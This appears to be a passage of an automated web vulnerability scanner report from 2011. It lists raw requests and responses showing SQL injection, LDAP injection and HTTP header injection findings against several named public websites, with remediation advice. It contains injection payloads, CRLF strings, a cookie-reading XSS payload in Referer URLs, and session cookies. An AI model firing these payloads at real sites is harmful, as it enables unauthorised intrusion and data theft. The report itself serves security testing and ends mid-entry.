GET /gastroenterology' HTTP/1.1 Host: www.slackbooks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=164007549.1296944200.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=164007549.371423654.1296944200.1296944200.1296944200.1; __utma_a2a=2564089484.1328501126.1296944200.1296944200.1296944213.2; __utmc=164007549; __utmb=164007549; ASP.NET_SessionId=g4ffc1a3nyrr0w55myx2al55;
Response 1
HTTP/1.1 500 Internal Server Error Connection: close Date: Sun, 06 Feb 2011 16:57:34 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 10049
<html> <head> <title>Unclosed quotation mark before the character string 'gastroenterology''.<br>Line 1: Incorrect syntax near 'gastroenterology''.</title> <style> bod ...[SNIP]...
Request 2
GET /gastroenterology'' HTTP/1.1 Host: www.slackbooks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=164007549.1296944200.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=164007549.371423654.1296944200.1296944200.1296944200.1; __utma_a2a=2564089484.1328501126.1296944200.1296944200.1296944213.2; __utmc=164007549; __utmb=164007549; ASP.NET_SessionId=g4ffc1a3nyrr0w55myx2al55;
Response 2
HTTP/1.1 404 Not Found Connection: close Date: Sun, 06 Feb 2011 16:57:35 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 11998
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be Microsoft SQL Server.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
Request 1
GET /homemodification' HTTP/1.1 Host: www.slackbooks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=164007549.1296944200.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=164007549.371423654.1296944200.1296944200.1296944200.1; __utma_a2a=2564089484.1328501126.1296944200.1296944200.1296944213.2; __utmc=164007549; __utmb=164007549; ASP.NET_SessionId=g4ffc1a3nyrr0w55myx2al55;
Response 1
HTTP/1.1 500 Internal Server Error Connection: close Date: Sun, 06 Feb 2011 16:59:58 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 10049
<html> <head> <title>Unclosed quotation mark before the character string 'homemodification''.<br>Line 1: Incorrect syntax near 'homemodification''.</title> <style> bod ...[SNIP]...
Request 2
GET /homemodification'' HTTP/1.1 Host: www.slackbooks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=164007549.1296944200.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=164007549.371423654.1296944200.1296944200.1296944200.1; __utma_a2a=2564089484.1328501126.1296944200.1296944200.1296944213.2; __utmc=164007549; __utmb=164007549; ASP.NET_SessionId=g4ffc1a3nyrr0w55myx2al55;
Response 2
HTTP/1.1 404 Not Found Connection: close Date: Sun, 06 Feb 2011 16:59:59 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 11998
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<!-- Site Name: Slackbooks.com -->
<html xmlns="http://www.w3.org/ ...[SNIP]...
1.62. http://www.slackbooks.com/homemodification [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.slackbooks.com
Path:
/homemodification
Issue detail
The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be Microsoft SQL Server.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
Request 1
GET /homemodification?1'=1 HTTP/1.1 Host: www.slackbooks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=164007549.1296944200.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=164007549.371423654.1296944200.1296944200.1296944200.1; __utma_a2a=2564089484.1328501126.1296944200.1296944200.1296944213.2; __utmc=164007549; __utmb=164007549; ASP.NET_SessionId=g4ffc1a3nyrr0w55myx2al55;
Response 1
HTTP/1.1 500 Internal Server Error Connection: close Date: Sun, 06 Feb 2011 16:59:34 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 9884
<html> <head> <title>Line 1: Incorrect syntax near '='.<br>Unclosed quotation mark before the character string ''.</title> <style> body {font-family:"Verdana";font-wei ...[SNIP]...
Request 2
GET /homemodification?1''=1 HTTP/1.1 Host: www.slackbooks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=164007549.1296944200.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=164007549.371423654.1296944200.1296944200.1296944200.1; __utma_a2a=2564089484.1328501126.1296944200.1296944200.1296944213.2; __utmc=164007549; __utmb=164007549; ASP.NET_SessionId=g4ffc1a3nyrr0w55myx2al55;
Response 2
HTTP/1.1 404 Not Found Connection: close Date: Sun, 06 Feb 2011 16:59:35 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 12012
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be Microsoft SQL Server.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
Request 1
GET /occupational+therapy' HTTP/1.1 Host: www.slackbooks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=164007549.1296944200.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=164007549.371423654.1296944200.1296944200.1296944200.1; __utma_a2a=2564089484.1328501126.1296944200.1296944200.1296944213.2; __utmc=164007549; __utmb=164007549; ASP.NET_SessionId=g4ffc1a3nyrr0w55myx2al55;
Response 1
HTTP/1.1 500 Internal Server Error Connection: close Date: Sun, 06 Feb 2011 17:01:11 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 10089
<html> <head> <title>Unclosed quotation mark before the character string 'occupational+therapy''.<br>Line 1: Incorrect syntax near 'occupational+therapy''.</title> <style>
...[SNIP]...
Request 2
GET /occupational+therapy'' HTTP/1.1 Host: www.slackbooks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=164007549.1296944200.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=164007549.371423654.1296944200.1296944200.1296944200.1; __utma_a2a=2564089484.1328501126.1296944200.1296944200.1296944213.2; __utmc=164007549; __utmb=164007549; ASP.NET_SessionId=g4ffc1a3nyrr0w55myx2al55;
Response 2
HTTP/1.1 404 Not Found Connection: close Date: Sun, 06 Feb 2011 17:01:12 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 12010
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be Microsoft SQL Server.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
Request 1
GET /ophthalmic+technology' HTTP/1.1 Host: www.slackbooks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=164007549.1296944200.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=164007549.371423654.1296944200.1296944200.1296944200.1; __utma_a2a=2564089484.1328501126.1296944200.1296944200.1296944213.2; __utmc=164007549; __utmb=164007549; ASP.NET_SessionId=g4ffc1a3nyrr0w55myx2al55;
Response 1
HTTP/1.1 500 Internal Server Error Connection: close Date: Sun, 06 Feb 2011 17:00:24 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 10099
<html> <head> <title>Unclosed quotation mark before the character string 'ophthalmic+technology''.<br>Line 1: Incorrect syntax near 'ophthalmic+technology''.</title> <style>
...[SNIP]...
Request 2
GET /ophthalmic+technology'' HTTP/1.1 Host: www.slackbooks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=164007549.1296944200.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=164007549.371423654.1296944200.1296944200.1296944200.1; __utma_a2a=2564089484.1328501126.1296944200.1296944200.1296944213.2; __utmc=164007549; __utmb=164007549; ASP.NET_SessionId=g4ffc1a3nyrr0w55myx2al55;
Response 2
HTTP/1.1 404 Not Found Connection: close Date: Sun, 06 Feb 2011 17:00:24 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 12012
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be Microsoft SQL Server.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
Request 1
GET /ophthalmology' HTTP/1.1 Host: www.slackbooks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=164007549.1296944200.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=164007549.371423654.1296944200.1296944200.1296944200.1; __utma_a2a=2564089484.1328501126.1296944200.1296944200.1296944213.2; __utmc=164007549; __utmb=164007549; ASP.NET_SessionId=g4ffc1a3nyrr0w55myx2al55;
Response 1
HTTP/1.1 500 Internal Server Error Connection: close Date: Sun, 06 Feb 2011 17:01:15 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 10019
<html> <head> <title>Unclosed quotation mark before the character string 'ophthalmology''.<br>Line 1: Incorrect syntax near 'ophthalmology''.</title> <style> body {fon ...[SNIP]...
Request 2
GET /ophthalmology'' HTTP/1.1 Host: www.slackbooks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=164007549.1296944200.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=164007549.371423654.1296944200.1296944200.1296944200.1; __utma_a2a=2564089484.1328501126.1296944200.1296944200.1296944213.2; __utmc=164007549; __utmb=164007549; ASP.NET_SessionId=g4ffc1a3nyrr0w55myx2al55;
Response 2
HTTP/1.1 404 Not Found Connection: close Date: Sun, 06 Feb 2011 17:01:17 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 11988
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be Microsoft SQL Server.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
Request 1
GET /orthopedics' HTTP/1.1 Host: www.slackbooks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 1
HTTP/1.1 500 Internal Server Error Connection: close Date: Sat, 05 Feb 2011 22:09:41 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 9999
<html> <head> <title>Unclosed quotation mark before the character string 'orthopedics''.<br>Line 1: Incorrect syntax near 'orthopedics''.</title> <style> body {font-fa ...[SNIP]...
Request 2
GET /orthopedics'' HTTP/1.1 Host: www.slackbooks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 2
HTTP/1.1 404 Not Found Connection: close Date: Sat, 05 Feb 2011 22:09:41 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId=33dnlq55duskvq55o1bwound; path=/; HttpOnly Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 11980
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be Microsoft SQL Server.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
Request 1
GET /pediatrics' HTTP/1.1 Host: www.slackbooks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=164007549.1296944200.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=164007549.371423654.1296944200.1296944200.1296944200.1; __utma_a2a=2564089484.1328501126.1296944200.1296944200.1296944213.2; __utmc=164007549; __utmb=164007549; ASP.NET_SessionId=g4ffc1a3nyrr0w55myx2al55;
Response 1
HTTP/1.1 500 Internal Server Error Connection: close Date: Sun, 06 Feb 2011 17:01:22 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 9989
<html> <head> <title>Unclosed quotation mark before the character string 'pediatrics''.<br>Line 1: Incorrect syntax near 'pediatrics''.</title> <style> body {font-fami ...[SNIP]...
Request 2
GET /pediatrics'' HTTP/1.1 Host: www.slackbooks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=164007549.1296944200.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=164007549.371423654.1296944200.1296944200.1296944200.1; __utma_a2a=2564089484.1328501126.1296944200.1296944200.1296944213.2; __utmc=164007549; __utmb=164007549; ASP.NET_SessionId=g4ffc1a3nyrr0w55myx2al55;
Response 2
HTTP/1.1 404 Not Found Connection: close Date: Sun, 06 Feb 2011 17:01:23 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 11978
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<!-- Site Name: Slackbooks.com -->
<html xmlns="http://www.w3.org/ ...[SNIP]...
2. LDAP injectionpreviousnext There are 3 instances of this issue:
LDAP injection arises when user-controllable data is copied in an unsafe way into an LDAP query that is performed by the application. If an attacker can inject LDAP metacharacters into the query, then they can interfere with the query's logic. Depending on the function for which the query is used, the attacker may be able to retrieve sensitive data to which they are not authorised, or subvert the application's logic to perform some unauthorised action.
Note that automated difference-based tests for LDAP injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Issue remediation
If possible, applications should avoid copying user-controllable data into LDAP queries. If this is unavoidable, then the data should be strictly validated to prevent LDAP injection attacks. In most situations, it will be appropriate to allow only short alphanumeric strings to be copied into queries, and any other input should be rejected. At a minimum, input containing any LDAP metacharacters should be rejected; characters that should be blocked include ( ) ; , * | & = and whitespace.
The pid parameter appears to be vulnerable to LDAP injection attacks.
The payloads da39f516a098b3de)(sn=* and da39f516a098b3de)!(sn=* were each submitted in the pid parameter. These two requests resulted in different responses, indicating that the input may be being incorporated into a disjunctive LDAP query in an unsafe manner.
Request 1
GET /bmx3/broker.pli?pid=da39f516a098b3de)(sn=*&PRAd=264255445&AR_C=185637072 HTTP/1.1 Host: ar.voicefive.com Proxy-Connection: keep-alive Referer: http://redacted/MRT/iview/264255445/direct;wi.300;hi.250/01/1354764918?click=http://adclick.g.doubleclick.net/aclk%3Fsa%3DL%26ai%3DBcyT_rqROTdLmI6iAlgf8zqmDD8WH7_4Bldn30BfAjbcB4JPpARABGAEg0OXxAjgAYMmGo4fUo4AQsgEIdGlwZC5jb226AQozMDB4MjUwX2FzyAEJ2gEYaHR0cDovL3RpcGQuY29tL3JlZ2lzdGVy4AEDuAIYyAKt1cMb4AIA6gIcdGlwZC1PdGhlcnMyX3NpZGViYXJfMzAweDI1MJAD6AKYA-gCqAMB0QNO9fRQWewlKugDhwfoA2voA-AC6APrBPUDAAIAxOAEAQ%26num%3D1%26sig%3DAGiWqtxTgjZHpd2on74ev1YZd4H94e6BEA%26client%3Dca-pub-7786708287155161%26adurl%3D Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ar_p67161473=exp=1&initExp=Sat Jan 8 03:20:09 2011&recExp=Sat Jan 8 03:20:09 2011&prad=55352400&cpn=4&arc=38899481&; ar_p83612734=exp=1&initExp=Fri Jan 28 22:52:05 2011&recExp=Fri Jan 28 22:52:05 2011&prad=57555319&arc=39967551&; ar_p45555483=exp=1&initExp=Sat Jan 29 01:32:02 2011&recExp=Sat Jan 29 01:32:02 2011&prad=59007464&arc=38601779&; ar_p68511049=exp=5&initExp=Mon Jan 31 16:31:23 2011&recExp=Mon Jan 31 17:13:10 2011&prad=264243128&arc=186035359&; ar_p85001580=exp=43&initExp=Wed Jan 26 20:14:29 2011&recExp=Sat Feb 5 15:06:35 2011&prad=58087444&arc=40401508&; UID=1d29d89e-72.246.30.75-1294456810
Response 1
HTTP/1.1 200 OK Server: nginx Date: Sun, 06 Feb 2011 13:40:00 GMT Content-Type: application/x-javascript Connection: close Set-Cookie: ar_da39f516a098b3de)(sn=exp=1&initExp=Sun Feb 6 13:40:00 2011&recExp=Sun Feb 6 13:40:00 2011&prad=264255445&arc=185637072&; expires=Sat 07-May-2011 13:40:00 GMT; path=/; domain=.voicefive.com; Set-Cookie: BMX_G=method->-1,ts->1296999600; path=/; domain=.voicefive.com; Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com; P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT" Cache-Control: max-age=0, no-cache, no-store, must-revalidate Pragma: no-cache Expires: -1 Vary: User-Agent,Accept-Encoding Content-Length: 9
/*error*/
Request 2
GET /bmx3/broker.pli?pid=da39f516a098b3de)!(sn=*&PRAd=264255445&AR_C=185637072 HTTP/1.1 Host: ar.voicefive.com Proxy-Connection: keep-alive Referer: http://redacted/MRT/iview/264255445/direct;wi.300;hi.250/01/1354764918?click=http://adclick.g.doubleclick.net/aclk%3Fsa%3DL%26ai%3DBcyT_rqROTdLmI6iAlgf8zqmDD8WH7_4Bldn30BfAjbcB4JPpARABGAEg0OXxAjgAYMmGo4fUo4AQsgEIdGlwZC5jb226AQozMDB4MjUwX2FzyAEJ2gEYaHR0cDovL3RpcGQuY29tL3JlZ2lzdGVy4AEDuAIYyAKt1cMb4AIA6gIcdGlwZC1PdGhlcnMyX3NpZGViYXJfMzAweDI1MJAD6AKYA-gCqAMB0QNO9fRQWewlKugDhwfoA2voA-AC6APrBPUDAAIAxOAEAQ%26num%3D1%26sig%3DAGiWqtxTgjZHpd2on74ev1YZd4H94e6BEA%26client%3Dca-pub-7786708287155161%26adurl%3D Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ar_p67161473=exp=1&initExp=Sat Jan 8 03:20:09 2011&recExp=Sat Jan 8 03:20:09 2011&prad=55352400&cpn=4&arc=38899481&; ar_p83612734=exp=1&initExp=Fri Jan 28 22:52:05 2011&recExp=Fri Jan 28 22:52:05 2011&prad=57555319&arc=39967551&; ar_p45555483=exp=1&initExp=Sat Jan 29 01:32:02 2011&recExp=Sat Jan 29 01:32:02 2011&prad=59007464&arc=38601779&; ar_p68511049=exp=5&initExp=Mon Jan 31 16:31:23 2011&recExp=Mon Jan 31 17:13:10 2011&prad=264243128&arc=186035359&; ar_p85001580=exp=43&initExp=Wed Jan 26 20:14:29 2011&recExp=Sat Feb 5 15:06:35 2011&prad=58087444&arc=40401508&; UID=1d29d89e-72.246.30.75-1294456810
Response 2
HTTP/1.1 200 OK Server: nginx Date: Sun, 06 Feb 2011 13:40:00 GMT Content-Type: application/x-javascript Connection: close Set-Cookie: ar_da39f516a098b3de)!(sn=exp=1&initExp=Sun Feb 6 13:40:00 2011&recExp=Sun Feb 6 13:40:00 2011&prad=264255445&arc=185637072&; expires=Sat 07-May-2011 13:40:00 GMT; path=/; domain=.voicefive.com; Set-Cookie: BMX_G=method->-1,ts->1296999600; path=/; domain=.voicefive.com; Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com; P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT" Cache-Control: max-age=0, no-cache, no-store, must-revalidate Pragma: no-cache Expires: -1 Vary: User-Agent,Accept-Encoding Content-Length: 9
The VISITOR_INFO1_LIVE cookie appears to be vulnerable to LDAP injection attacks.
The payloads *)(sn=* and *)!(sn=* were each submitted in the VISITOR_INFO1_LIVE cookie. These two requests resulted in different responses, indicating that the input may be being incorporated into a conjunctive LDAP query in an unsafe manner.
Request 1
GET /v/VUCJyeb_3Mo?fs=1&hl=en_US&color1=0x3a3a3a&color2=0x999999 HTTP/1.1 Host: www.youtube.com Proxy-Connection: keep-alive Referer: http://www.owneriq.com/manuals-online?4a4b1%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E18871e2d338=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: VISITOR_INFO1_LIVE=*)(sn=*; use_hitbox=72c46ff6cbcdb7c5585c36411b6b334edAEAAAAw; GEO=c0f1d1d2c857cb01c350c8b8c68c361ecwsAAAAzVVOtwdbzTU3HFg==
The VISITOR_INFO1_LIVE cookie appears to be vulnerable to LDAP injection attacks.
The payloads 4e65bf9585ccb14d)(sn=* and 4e65bf9585ccb14d)!(sn=* were each submitted in the VISITOR_INFO1_LIVE cookie. These two requests resulted in different responses, indicating that the input may be being incorporated into a disjunctive LDAP query in an unsafe manner.
Request 1
GET /v/sj4BVK0o-7w HTTP/1.1 Host: www.youtube.com Proxy-Connection: keep-alive Referer: http://www.mittelstandsblog.de/?d18cb%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E02e0a7e96b=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: VISITOR_INFO1_LIVE=4e65bf9585ccb14d)(sn=*
HTTP header injection vulnerabilities arise when user-supplied data is copied into a response header in an unsafe way. If an attacker can inject newline characters into the header, then they can inject new HTTP headers and also, by injecting an empty line, break out of the headers into the message body and write arbitrary content into the application's response.
Various kinds of attack can be delivered via HTTP header injection vulnerabilities. Any attack that can be delivered via cross-site scripting can usually be delivered via header injection, because the attacker can construct a request which causes arbitrary JavaScript to appear within the response body. Further, it is sometimes possible to leverage header injection vulnerabilities to poison the cache of any proxy server via which users access the application. Here, an attacker sends a crafted request which results in a "split" response containing arbitrary content. If the proxy server can be manipulated to associate the injected response with another URL used within the application, then the attacker can perform a "stored" attack against this URL which will compromise other users who request that URL in future.
Issue remediation
If possible, applications should avoid copying user-controllable data into HTTP response headers. If this is unavoidable, then the data should be strictly validated to prevent header injection attacks. In most situations, it will be appropriate to allow only short alphanumeric strings to be copied into headers, and any other input should be rejected. At a minimum, input containing any characters with ASCII codes less than 0x20 should be rejected.
The value of REST URL parameter 1 is copied into the Location response header. The payload 9bf0b%0d%0ad1d5184d06f was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /9bf0b%0d%0ad1d5184d06f/N553.158901.DATAXU/B4970757.11 HTTP/1.1 Host: ad.doubleclick.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: id=c653243310000d9|189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc;
Response
HTTP/1.1 302 Moved Temporarily Content-Type: text/html Content-Length: 36 Location: http://static.2mdn.net/9bf0b d1d5184d06f/N553.158901.DATAXU/B4970757.11: Date: Sat, 05 Feb 2011 21:50:27 GMT Server: GFE/2.0 Connection: close
The value of REST URL parameter 1 is copied into the Location response header. The payload 843f5%0d%0acb11c15fe77 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /843f5%0d%0acb11c15fe77/N815.286991.WEBBUYERSGUIDE/B5173264;sz=1x1;ord=[timestamp]? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.baselinemag.com/c/a/IT-Management/Macys-Ramps-Up-Online-Operations-637464/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c653243310000d9|189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc
Response
HTTP/1.1 302 Moved Temporarily Content-Type: text/html Content-Length: 36 Location: http://static.2mdn.net/843f5 cb11c15fe77/N815.286991.WEBBUYERSGUIDE/B5173264%3Bsz%3D1x1%3Bord%3D%5Btimestamp%5D: Date: Sun, 06 Feb 2011 13:22:39 GMT Server: GFE/2.0
The value of REST URL parameter 1 is copied into the Location response header. The payload 1032c%0d%0a72456777471 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
